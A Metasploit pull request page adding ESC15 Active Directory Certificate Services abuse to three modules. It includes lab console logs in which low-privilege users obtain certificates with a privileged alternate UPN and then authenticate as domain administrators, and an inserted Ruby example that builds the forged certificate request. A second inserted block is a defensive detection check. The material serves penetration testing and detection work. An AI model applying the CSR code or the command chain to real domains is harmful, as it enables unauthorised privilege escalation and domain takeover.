
Add Support for ESC15 #19538

Merged (7 commits) on Oct 17, 2024

Conversation

@zeroSteiner (Contributor) commented Oct 8, 2024

This adds support for ESC15 to various AD CS related modules. A template is added so the ad_cs_cert_template module can create and update templates to be vulnerable to ESC15 (downgrading the schema may not work and should be tested, but creating a net-new one does work). Fingerprinting is added to the ldap_esc_vulnerable_cert_finder module to identify templates that are vulnerable to ESC15. Finally, OIDs can be specified in the icpr_cert module so a vulnerable template can be exploited by a user.

Todo

  • Test the issued certificate authenticates as the user who specified
  • Update the workflow docs for exploiting ESC15
  • Update the icpr_cert docs for the new option
  • Check on and write missing tests as necessary

Demo

Not sure why the session is showing up as from 127.0.0.1 to 127.0.0.1, but with the new ldap whoami changes, it shows that the certificate authenticated as the MSFLAB\smcintyre DA user and not the MSFLAB\mhatter normal user who issued it.

msf6 auxiliary(admin/dcerpc/icpr_cert) > show options 

Module options (auxiliary/admin/dcerpc/icpr_cert):

   Name                 Current Setting                           Required  Description
   ----                 ---------------                           --------  -----------
   ADD_CERT_APP_POLICY  1.3.6.1.4.1.311.20.2.2;1.3.6.1.5.5.7.3.2  no        Add certificate application policy OIDs
   ALT_DNS                                                        no        Alternative certificate DNS
   ALT_SID                                                        no        Alternative object SID
   ALT_UPN              [email protected]                    no        Alternative certificate UPN (format: USER@DOMAIN)
   CA                   msflab-DC-CA                              yes       The target certificate authority
   CERT_TEMPLATE        ESC15-Test                                yes       The certificate template
   ON_BEHALF_OF                                                   no        Username to request on behalf of (format: DOMAIN\USER)
   PFX                                                            no        Certificate to request on behalf of


   Used when connecting via an existing SESSION:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   no        The session to run this module on


   Used when making a new connection via RHOSTS:

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   RHOSTS     192.168.159.10   no        The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT      445              no        The target port (TCP)
   SMBDomain  .                no        The Windows domain to use for authentication
   SMBPass    Password1!       no        The password for the specified username
   SMBUser    mhatter          no        The username to authenticate as


Auxiliary action:

   Name          Description
   ----          -----------
   REQUEST_CERT  Request a certificate



View the full module info with the info, or info -d command.

msf6 auxiliary(admin/dcerpc/icpr_cert) > run
[*] Running module against 192.168.159.10

[*] 192.168.159.10:445 - Connecting to ICertPassage (ICPR) Remote Protocol
[*] 192.168.159.10:445 - Binding to \cert...
[+] 192.168.159.10:445 - Bound to \cert
[*] 192.168.159.10:445 - Requesting a certificate for user mhatter - alternate UPN: [email protected] - digest algorithm: SHA256 - template: ESC15-Test
[+] 192.168.159.10:445 - The requested certificate was issued.
[*] 192.168.159.10:445 - Certificate UPN: [email protected]
[*] 192.168.159.10:445 - Certificate Policies:
[*] 192.168.159.10:445 -   * 1.3.6.1.4.1.311.20.2.2 (Smart Card Logon)
[*] 192.168.159.10:445 -   * 1.3.6.1.5.5.7.3.2 (Client Authentication)
[*] 192.168.159.10:445 - Certificate stored at: /home/smcintyre/.msf4/loot/20241009153533_default_192.168.159.10_windows.ad.cs_800367.pfx
[*] Auxiliary module execution completed
msf6 auxiliary(admin/dcerpc/icpr_cert) > previous 
[*] The CreateSession option within this module can open an interactive session
msf6 auxiliary(scanner/ldap/ldap_login) > run RHOSTS=192.168.159.10 LDAP::Auth=schannel SSL=true LDAP::CertFile=/home/smcintyre/.msf4/loot/20241009153533_default_192.168.159.10_windows.ad.cs_800367.pfx

[+] Success: 'Cert File /home/smcintyre/.msf4/loot/20241009153533_default_192.168.159.10_windows.ad.cs_800367.pfx'
[*] LDAP session 2 opened (127.0.0.1 -> 127.0.0.1) at 2024-10-09 15:35:50 -0400
[*] Scanned 1 of 1 hosts (100% complete)
[*] Bruteforce completed, 1 credential was successful.
[*] 1 LDAP session was opened successfully.
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/ldap/ldap_login) > sessions -i -1
[*] Starting interaction with 2...

LDAP (192.168.159.10) > getuid
[*] Server username: MSFLAB\smcintyre
LDAP (192.168.159.10) >

Testing Steps

  • Use the ad_cs_cert_template to create a vulnerable certificate using the new template
    • Use the same module to read the certificate template to see that the schema is 1 and that the Client Authentication EKU is missing
  • Use the ldap_esc_vulnerable_cert_finder module to identify the new template
  • Use the icpr_cert module to issue a certificate
    • Use the new option to specify an EKU to add of 1.3.6.1.5.5.7.3.2 (Client Authentication)
    • Use the ALT_UPN option to specify a privileged user
    • When the certificate is issued, see the EKU that was specified listed as a certificate policy
  • Use the ldap_login module to authenticate using schannel to the server with the certificate
  • Run the getuid command on the session and see that it is authenticated as the user specified in the ALT_UPN datastore argument when the cert was issued
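The request the icpr_cert step above sends, as an added example written for this page (it is not code from the PR or from Metasploit's ms_icpr mixin): a CSR that carries a UPN otherName in subjectAltName and a Microsoft Application Policies extension (1.3.6.1.4.1.311.21.10) listing the OIDs the operator chose. That is the pair the demo output shows being copied into the issued certificate ("Certificate UPN" and "Certificate Policies"); the Application Policies extension is the piece that a schema-version-1 template lets the enrollee supply, and adding Client Authentication to it is what turns a Server Authentication-only template into a logon certificate for the UPN holder. The OID constants come from public Microsoft documentation, the subject, UPN and helper names are this example's own assumptions, and the parsing helpers only exist so the block can check its own output.

```ruby
require 'openssl'

# OIDs from public AD CS / PKIX documentation (assumed here, not taken from the PR)
OID_APPLICATION_CERT_POLICIES = '1.3.6.1.4.1.311.21.10' # szOID_APPLICATION_CERT_POLICIES
OID_NT_PRINCIPAL_NAME         = '1.3.6.1.4.1.311.20.2.3' # szOID_NT_PRINCIPAL_NAME (UPN otherName)
OID_SUBJECT_ALT_NAME          = '2.5.29.17'
OID_PKCS9_EXTENSION_REQUEST   = '1.2.840.113549.1.9.14'
OID_CLIENT_AUTH               = '1.3.6.1.5.5.7.3.2'
OID_SMARTCARD_LOGON           = '1.3.6.1.4.1.311.20.2.2'

# subjectAltName ::= SEQUENCE OF GeneralName; one otherName entry:
#   [0] IMPLICIT SEQUENCE { type-id OBJECT IDENTIFIER, value [0] EXPLICIT UTF8String }
def upn_san_extension(upn)
  other_name = OpenSSL::ASN1::Sequence.new(
    [
      OpenSSL::ASN1::ObjectId.new(OID_NT_PRINCIPAL_NAME),
      OpenSSL::ASN1::UTF8String.new(upn, 0, :EXPLICIT, :CONTEXT_SPECIFIC)
    ],
    0, :IMPLICIT, :CONTEXT_SPECIFIC
  )
  san = OpenSSL::ASN1::Sequence.new([other_name])
  OpenSSL::X509::Extension.new(OID_SUBJECT_ALT_NAME, san.to_der, false)
end

# Application Policies ::= SEQUENCE OF SEQUENCE { policyIdentifier OBJECT IDENTIFIER }
# Same shape as certificatePolicies but under the Microsoft OID; on a v1 template the
# CA takes these from the request instead of from pKIExtendedKeyUsage.
def application_policies_extension(oids)
  policies = oids.map { |oid| OpenSSL::ASN1::Sequence.new([OpenSSL::ASN1::ObjectId.new(oid)]) }
  OpenSSL::X509::Extension.new(OID_APPLICATION_CERT_POLICIES,
                               OpenSSL::ASN1::Sequence.new(policies).to_der, false)
end

# Build and sign the CSR; the extensions ride in the PKCS#9 extensionRequest attribute.
def build_esc15_csr(key, subject_cn:, alt_upn:, app_policies:)
  req = OpenSSL::X509::Request.new
  req.version = 0
  req.subject = OpenSSL::X509::Name.new([['CN', subject_cn]])
  req.public_key = key
  exts = [upn_san_extension(alt_upn), application_policies_extension(app_policies)]
  ext_req = OpenSSL::ASN1::Set.new([OpenSSL::ASN1::Sequence.new(exts)])
  req.add_attribute(OpenSSL::X509::Attribute.new('extReq', ext_req))
  req.sign(key, OpenSSL::Digest.new('SHA256'))
  req
end

# --- read-back helpers, used to confirm what the CA will see in the request ---

def dotted_oid(name_or_oid)
  OpenSSL::ASN1::ObjectId.new(name_or_oid).oid # 'subjectAltName' -> '2.5.29.17'
end

def csr_extensions(req)
  attr = req.attributes.find { |a| dotted_oid(a.oid) == OID_PKCS9_EXTENSION_REQUEST }
  return [] unless attr
  # attribute value is SET { SEQUENCE OF Extension }
  attr.value.value.first.value.map { |ext| OpenSSL::X509::Extension.new(ext.to_der) }
end

# Extension ::= SEQUENCE { extnID, critical DEFAULT FALSE, extnValue OCTET STRING }
def extension_value_der(ext)
  OpenSSL::ASN1.decode(ext.to_der).value.last.value
end

def csr_upn(req)
  san = csr_extensions(req).find { |e| dotted_oid(e.oid) == OID_SUBJECT_ALT_NAME }
  return nil unless san
  OpenSSL::ASN1.decode(extension_value_der(san)).value.each do |name|
    next unless name.tag == 0 && name.tag_class == :CONTEXT_SPECIFIC # otherName
    type_id, value = name.value
    return value.value.first.value if type_id.oid == OID_NT_PRINCIPAL_NAME
  end
  nil
end

def csr_application_policies(req)
  ext = csr_extensions(req).find { |e| dotted_oid(e.oid) == OID_APPLICATION_CERT_POLICIES }
  return [] unless ext
  OpenSSL::ASN1.decode(extension_value_der(ext)).value.map { |policy| policy.value.first.oid }
end

if __FILE__ == $PROGRAM_NAME
  key = OpenSSL::PKey::RSA.new(2048)
  # constructed sample: low-privilege requester, privileged UPN in the SAN
  req = build_esc15_csr(key, subject_cn: 'lowpriv', alt_upn: 'admin@example.local',
                        app_policies: [OID_SMARTCARD_LOGON, OID_CLIENT_AUTH])
  puts req.to_pem
  puts "UPN in request:      #{csr_upn(req)}"
  puts "Application policies: #{csr_application_policies(req).join(', ')}"
end
```

Submitting this request to a CA over ICPR is what icpr_cert does; the check a practitioner wants afterwards is the one the demo performs, namely that the issued certificate's UPN and policies match the request and that the resulting LDAP or Kerberos logon lands as the UPN holder rather than the enrolling account.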

@smcintyre-r7 added the needs-docs and rn-modules (release notes for new or majorly enhanced modules) labels on Oct 8, 2024
github-actions bot commented Oct 8, 2024

Thanks for your pull request! Before this can be merged, we need the following documentation for your module:

@zeroSteiner force-pushed the feat/mod/adcs-esc15 branch 2 times, most recently from 6ed9de2 to 0e3eb45 on October 8, 2024 22:00
@zeroSteiner marked this pull request as ready for review on October 9, 2024 21:40
@adfoster-r7 (Contributor)

Would you be able to throw in a quick report_vuln here for the new vuln? 🤞

Or I'm also happy to wait for Christophe to pick up the report_vuln calls in one batch/PR if that's easier 💯

@cdelafuente-r7 (Contributor)

Thanks! I haven't tested it yet, but it looks good to me.

Regarding the report_vuln, is it something we could simply add to #print_vulnerable_cert_info? It looks like the @vuln_certificate_details data structure already has all the information.

@zeroSteiner (Contributor, Author)

Alright with the latest commit in place, I'm reporting all of the vulnerabilities that the module is capable of finding.

msf6 auxiliary(gather/ldap_esc_vulnerable_cert_finder) > vulns --info

Vulnerabilities
===============

Timestamp                Host            Name                References                                                    Information
---------                ----            ----                ----------                                                    -----------
2024-10-10 13:23:44 UTC  192.168.159.10  ESC1 - ESC1-Test    https://posts.specterops.io/certified-pre-owned-d95910965cd2  Request can specify a subjectAltName (msPKI-Certificate-Name-Flag) and EKUs permit authentication
2024-10-10 13:23:44 UTC  192.168.159.10  ESC2 - ESC2-Test    https://posts.specterops.io/certified-pre-owned-d95910965cd2  Template defines the Any Purpose OID or no EKUs (PkiExtendedKeyUsage)
2024-10-10 13:23:44 UTC  192.168.159.10  ESC15 - ESC15-Test  https://trustedsec.com/blog/ekuwu-not-just-another-ad-cs-esc  Request can specify a subjectAltName (msPKI-Certificate-Name-Flag) and EKUs can be altered (msPKI-Template-Schema-Version)

msf6 auxiliary(gather/ldap_esc_vulnerable_cert_finder) > 

Comment on lines +936 to +938
In the following example, the Client Authentication OID (1.3.6.1.5.5.7.3.2) is added which enables the certificate to be
used for authentication to LDAP via SCHANNEL. The operator can then perform LDAP queries with the privileges of the user
specified in the alternate UPN.
Contributor

Do we have any LDAP module that can be used with this certificate as an example?

lib/msf/core/exploit/remote/ms_icpr.rb (outdated; resolved)
@cdelafuente-r7 self-assigned this on Oct 17, 2024
@cdelafuente-r7 merged commit f636a9e into rapid7:master on Oct 17, 2024
64 of 70 checks passed
@cdelafuente-r7 (Contributor)

Thanks for updating this @zeroSteiner! Everything looks good to me now.

Scenarios

Check certificate template

msf6 auxiliary(admin/ldap/ad_cs_cert_template) > run verbose=true RHOSTS=10.241.33.12 username=Administrator password=123456 domain=mydomain.local CERT_TEMPLATE=ESC15
[*] Running module against 10.241.33.12

[+] Successfully bound to the LDAP server!
[*] Discovering base DN automatically
[+] Read certificate template data for: CN=ESC15,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=mydomain,DC=local
[*] Certificate template data written to: /home/n00tmeg/.msf4/loot/20241017174300_default_10.241.33.12_windows.ad.cs.te_924718.json
[*] Certificate Template:
[*]   distinguishedName: CN=ESC15,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=mydomain,DC=local
[*]   displayName:       ESC15
[*]   objectGUID:        f44e1d55-0c7d-4af2-b1f3-88c40c1f69c5
[*]   msPKI-Certificate-Name-Flag: 0x00000001
[*]     * CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT
[*]   msPKI-Enrollment-Flag: 0x00000000
[*]   msPKI-Private-Key-Flag: 0x00000010
[*]     * CT_FLAG_EXPORTABLE_KEY
[*]   msPKI-RA-Signature: 0x00000000
[*]   msPKI-Template-Schema-Version: 1
[*]   pKIKeyUsage: 0x00000000
[*]   pKIExtendedKeyUsage:
[*]     * 1.3.6.1.5.5.7.3.1 (Server Authentication)
[*]   pKIMaxIssuingDepth: -1
[+] The operation completed successfully!
[*] Auxiliary module execution completed

Check ESC15 with gather/ldap_esc_vulnerable_cert_finder

msf6 auxiliary(gather/ldap_esc_vulnerable_cert_finder) > run rhosts=10.241.33.12 [email protected] password=vagrant
[*] Running module against 10.241.33.12

[*] Discovering base DN automatically
...[SNIP]...
[+] Template: ESC15
[*]   Distinguished Name: CN=ESC15,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=mydomain,DC=local
[*]   Manager Approval: Disabled
[*]   Required Signatures: 0
[+]   Vulnerable to: ESC15
[*]   Notes: ESC15: Request can specify a subjectAltName (msPKI-Certificate-Name-Flag) and EKUs can be altered (msPKI-Template-Schema-Version)
[*]   Certificate Template Enrollment SIDs:
[*]     * S-1-5-11 (Authenticated Users)
[+]   Issuing CA: dc-mydomain.local-CA (dc.mydomain.local)
[*]     Enrollment SIDs:
[*]       * S-1-5-11 (Authenticated Users)
[*]       * S-1-5-21-130659923-1051543964-1529139330-519 (Enterprise Admins)
[*]       * S-1-5-21-130659923-1051543964-1529139330-512 (Domain Admins)
[*] Auxiliary module execution completed
msf6 auxiliary(gather/ldap_esc_vulnerable_cert_finder) > vulns

Vulnerabilities
===============

Timestamp                Host          Name                    References
---------                ----          ----                    ----------
2024-10-17 16:41:06 UTC  10.241.33.12  ESC1 - ESC1             https://posts.specterops.io/certified-pre-owned-d95910965cd2
2024-10-17 16:41:07 UTC  10.241.33.12  ESC2 - ESC2             https://posts.specterops.io/certified-pre-owned-d95910965cd2
2024-10-17 16:41:08 UTC  10.241.33.12  ESC3 - ESC3_TEMPLATE_1  https://posts.specterops.io/certified-pre-owned-d95910965cd2
2024-10-17 16:41:12 UTC  10.241.33.12  ESC13 - ESC13           https://posts.specterops.io/adcs-esc13-abuse-technique-fda4272fbd53
2024-10-17 16:41:13 UTC  10.241.33.12  ESC15 - ESC15           https://trustedsec.com/blog/ekuwu-not-just-another-ad-cs-esc

Client Authentication OID (1.3.6.1.5.5.7.3.2)

msf6 auxiliary(admin/dcerpc/icpr_cert) > run verbose=true CA=dc-mydomain.local-CA RHOSTS=10.241.33.12 username=sandy password=vagrant domain=mydomain.local CERT_TEMPLATE=ESC15 ADD_CERT_APP_POLICY=1.3.6.1.5.5.7.3.2 [email protected]
[*] Running module against 10.241.33.12

[*] 10.241.33.12:445 - Connecting to ICertPassage (ICPR) Remote Protocol
[*] 10.241.33.12:445 - Binding to \cert...
[+] 10.241.33.12:445 - Bound to \cert
[*] 10.241.33.12:445 - Requesting a certificate for user sandy - alternate UPN: [email protected] - digest algorithm: SHA256 - template: ESC15
[+] 10.241.33.12:445 - The requested certificate was issued.
[*] 10.241.33.12:445 - Certificate UPN: [email protected]
[*] 10.241.33.12:445 - Certificate Policies:
[*] 10.241.33.12:445 -   * 1.3.6.1.5.5.7.3.2 (Client Authentication)
[*] 10.241.33.12:445 - Certificate stored at: /home/n00tmeg/.msf4/loot/20241017182504_default_10.241.33.12_windows.ad.cs_448124.pfx
msf6 auxiliary(scanner/ldap/ldap_login) > run verbose=true RHOSTS=10.241.33.12 LDAP::Auth=schannel SSL=true username=foo password=bar CreateSession=true Ldap::CertFile=/home/n00tmeg/.msf4/loot/20241017182504_default_10.241.33.12_windows.ad.cs_448124.pfx

[+] Success: 'Cert File /home/n00tmeg/.msf4/loot/20241017182504_default_10.241.33.12_windows.ad.cs_448124.pfx'
[*] LDAP session 1 opened (127.0.0.1 -> 127.0.0.1) at 2024-10-17 18:35:53 +0200
[*] Scanned 1 of 1 hosts (100% complete)
[*] Bruteforce completed, 1 credential was successful.
[*] 1 LDAP session was opened successfully.
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/ldap/ldap_login) > sessions -1
[*] Starting interaction with 1...

LDAP (10.241.33.12) > getuid
[*] Server username: AD\Administrator

Certificate Request Agent OID (1.3.6.1.4.1.311.20.2.1)

msf6 auxiliary(admin/dcerpc/icpr_cert) > run verbose=true CA=dc-mydomain.local-CA RHOSTS=10.241.33.12 username=sandy password=vagrant domain=mydomain.local CERT_TEMPLATE=ESC15 ADD_CERT_APP_POLICY=1.3.6.1.4.1.311.20.2.1
[*] Running module against 10.241.33.12

[*] 10.241.33.12:445 - Connecting to ICertPassage (ICPR) Remote Protocol
[*] 10.241.33.12:445 - Binding to \cert...
[+] 10.241.33.12:445 - Bound to \cert
[*] 10.241.33.12:445 - Requesting a certificate for user sandy - digest algorithm: SHA256 - template: ESC15
[+] 10.241.33.12:445 - The requested certificate was issued.
[*] 10.241.33.12:445 - Certificate Policies:
[*] 10.241.33.12:445 -   * 1.3.6.1.4.1.311.20.2.1 (Certificate Request Agent)
[*] 10.241.33.12:445 - Certificate stored at: /home/n00tmeg/.msf4/loot/20241017175147_default_10.241.33.12_windows.ad.cs_303720.pfx
[*] Auxiliary module execution completed



msf6 auxiliary(admin/dcerpc/icpr_cert) > run verbose=true CA=dc-mydomain.local-CA RHOSTS=10.241.33.12 username=sandy password=vagrant domain=mydomain.local CERT_TEMPLATE=User on_behalf_of=AD\\administrator pfx=/home/n00tmeg/.msf4/loot/20241017175147_default_10.241.33.12_windows.ad.cs_303720.pfx
[*] Running module against 10.241.33.12

[*] 10.241.33.12:445 - Connecting to ICertPassage (ICPR) Remote Protocol
[*] 10.241.33.12:445 - Binding to \cert...
[+] 10.241.33.12:445 - Bound to \cert
[*] 10.241.33.12:445 - Building certificate request on behalf of AD\administrator
[*] 10.241.33.12:445 - Requesting a certificate for user sandy - digest algorithm: SHA256 - on behalf of: AD\administrator - template: User
[+] 10.241.33.12:445 - The requested certificate was issued.
[*] 10.241.33.12:445 - Certificate UPN: [email protected]
[*] 10.241.33.12:445 - Certificate stored at: /home/n00tmeg/.msf4/loot/20241017175336_default_10.241.33.12_windows.ad.cs_069695.pfx
[*] Auxiliary module execution completed
msf6 auxiliary(admin/kerberos/get_ticket) > run verbose=true RHOSTS=10.241.33.12 cert_file=/home/n00tmeg/.msf4/loot/20241017175336_default_10.241.33.12_windows.ad.cs_069695.pfx
[*] Running module against 10.241.33.12

[*] 10.241.33.12:88 - Getting TGT for [email protected]
[+] 10.241.33.12:88 - Received a valid TGT-Response
[*] 10.241.33.12:88 - TGT MIT Credential Cache ticket saved to /home/n00tmeg/.msf4/loot/20241017180144_default_10.241.33.12_mit.kerberos.cca_181591.bin
[*] Auxiliary module execution completed
msf6 auxiliary(admin/kerberos/get_ticket) > use scanner/winrm/winrm_cmd
msf6 auxiliary(scanner/winrm/winrm_cmd) > run verbose=true RHOSTS=10.241.33.12 Winrm::Auth=kerberos Winrm::Rhostname=dc username=administrator domain=mydomain.local DomainControllerRhost=10.241.33.12 cmd=whoami

[*] Using cached credential for krbtgt/[email protected] [email protected]
[+] 10.241.33.12:88 - Received a valid TGS-Response
[*] 10.241.33.12:5985     - TGS MIT Credential Cache ticket saved to /home/n00tmeg/.msf4/loot/20241017180202_default_10.241.33.12_mit.kerberos.cca_006143.bin
[+] 10.241.33.12:88 - Received a valid delegation TGS-Response
[+] 10.241.33.12:88 - Received AP-REQ. Extracting session key...
ad\administrator
[+] Results saved to /home/n00tmeg/.msf4/loot/20241017180206_default_10.241.33.12_winrm.cmd_result_670129.txt
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
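The fingerprint behind the "Vulnerable to: ESC15" line in the finder output above, and behind the template dump it was run against, as an added example written for this page (not the module's own code): a template is worth flagging when the enrollee may supply the subject (CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT in msPKI-Certificate-Name-Flag), the schema version is 1 (so the application policies in the request are honoured), no manager approval or RA signature stands in the way, and both the template and the issuing CA are enrollable by a low-privilege principal. The flag values are from Microsoft's [MS-CRTD] documentation; the sample template and SIDs are constructed to match the ESC15 dump on this page, and the hash keys are the LDAP attribute names plus an 'enrollment_sids' key of this example's own choosing.

```ruby
# Bit flags from [MS-CRTD] (assumed from public documentation, not from the PR)
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001 # msPKI-Certificate-Name-Flag
CT_FLAG_PEND_ALL_REQUESTS         = 0x00000002 # msPKI-Enrollment-Flag: manager approval required

# Principals that amount to "any domain user": Everyone, Authenticated Users, Domain Users (RID 513)
def low_privilege_sid?(sid)
  %w[S-1-1-0 S-1-5-11].include?(sid) || sid.end_with?('-513')
end

# Constructed sample shaped like the ad_cs_cert_template dump above: schema 1,
# enrollee supplies subject, only Server Authentication in pKIExtendedKeyUsage.
SAMPLE_ESC15_TEMPLATE = {
  'cn'                            => 'ESC15',
  'msPKI-Certificate-Name-Flag'   => 0x00000001,
  'msPKI-Enrollment-Flag'         => 0x00000000,
  'msPKI-RA-Signature'            => 0,
  'msPKI-Template-Schema-Version' => 1,
  'pKIExtendedKeyUsage'           => ['1.3.6.1.5.5.7.3.1'],
  'enrollment_sids'               => ['S-1-5-11']
}.freeze

# Constructed: the issuing CA's own enrollment ACL (Authenticated Users + Domain Admins)
SAMPLE_CA_ENROLLMENT_SIDS = ['S-1-5-11', 'S-1-5-21-130659923-1051543964-1529139330-512'].freeze

# Returns { vulnerable:, notes:, blocked_by: } where notes lists the conditions that hold
# and blocked_by the ones that would stop a low-privilege user exploiting the template.
def esc15_check(template, ca_enrollment_sids)
  name_flag   = template.fetch('msPKI-Certificate-Name-Flag').to_i
  enroll_flag = template.fetch('msPKI-Enrollment-Flag').to_i
  schema      = template.fetch('msPKI-Template-Schema-Version').to_i
  signatures  = template.fetch('msPKI-RA-Signature').to_i
  low_tpl     = template.fetch('enrollment_sids').select { |s| low_privilege_sid?(s) }
  low_ca      = ca_enrollment_sids.select { |s| low_privilege_sid?(s) }

  conditions = {
    'request can specify a subjectAltName (msPKI-Certificate-Name-Flag)'      => (name_flag & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT) != 0,
    'EKUs can be altered via application policies (msPKI-Template-Schema-Version = 1)' => schema == 1,
    'manager approval disabled (msPKI-Enrollment-Flag)'                       => (enroll_flag & CT_FLAG_PEND_ALL_REQUESTS) == 0,
    'no RA signatures required (msPKI-RA-Signature)'                          => signatures.zero?,
    "template enrollable by low-privilege SID (#{low_tpl.join(', ')})"        => !low_tpl.empty?,
    "issuing CA enrollable by low-privilege SID (#{low_ca.join(', ')})"       => !low_ca.empty?
  }
  held   = conditions.select { |_, ok| ok }.keys
  failed = conditions.reject { |_, ok| ok }.keys
  { vulnerable: failed.empty?, notes: held, blocked_by: failed }
end

if __FILE__ == $PROGRAM_NAME
  [
    ['as dumped above', SAMPLE_ESC15_TEMPLATE],
    ['same template, schema 2', SAMPLE_ESC15_TEMPLATE.merge('msPKI-Template-Schema-Version' => 2)],
    ['same template, manager approval on', SAMPLE_ESC15_TEMPLATE.merge('msPKI-Enrollment-Flag' => CT_FLAG_PEND_ALL_REQUESTS)]
  ].each do |label, tpl|
    result = esc15_check(tpl, SAMPLE_CA_ENROLLMENT_SIDS)
    puts "#{tpl['cn']} (#{label}): vulnerable=#{result[:vulnerable]}"
    result[:blocked_by].each { |why| puts "  blocked by: #{why}" }
  end
end
```

Note what this check does not look at: pKIExtendedKeyUsage. A schema-1 template that already carries Client Authentication and lets the enrollee supply the subject is the classic ESC1 case and is reported separately by the finder; ESC15 is the finding for templates whose EKU list would otherwise look harmless, which is why the Server Authentication-only template above still comes back vulnerable. The blocked_by list is the remediation hint: raising the schema version (a net-new template, as the description advises) or requiring manager approval each clears the finding on its own.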

@cdelafuente-r7 (Contributor) commented Oct 17, 2024

Release Notes

This adds support for ESC15 to three AD CS related modules. A template is added so the ad_cs_cert_template module can create and update templates to be vulnerable to ESC15. To ensure that this works each time, create a net-new template. Fingerprinting is added to the ldap_esc_vulnerable_cert_finder module to identify templates that are vulnerable to ESC15. OIDs can be specified in the icpr_cert module so a vulnerable template can be exploited by a user.

Labels: rn-modules (release notes for new or majorly enhanced modules)
5 participants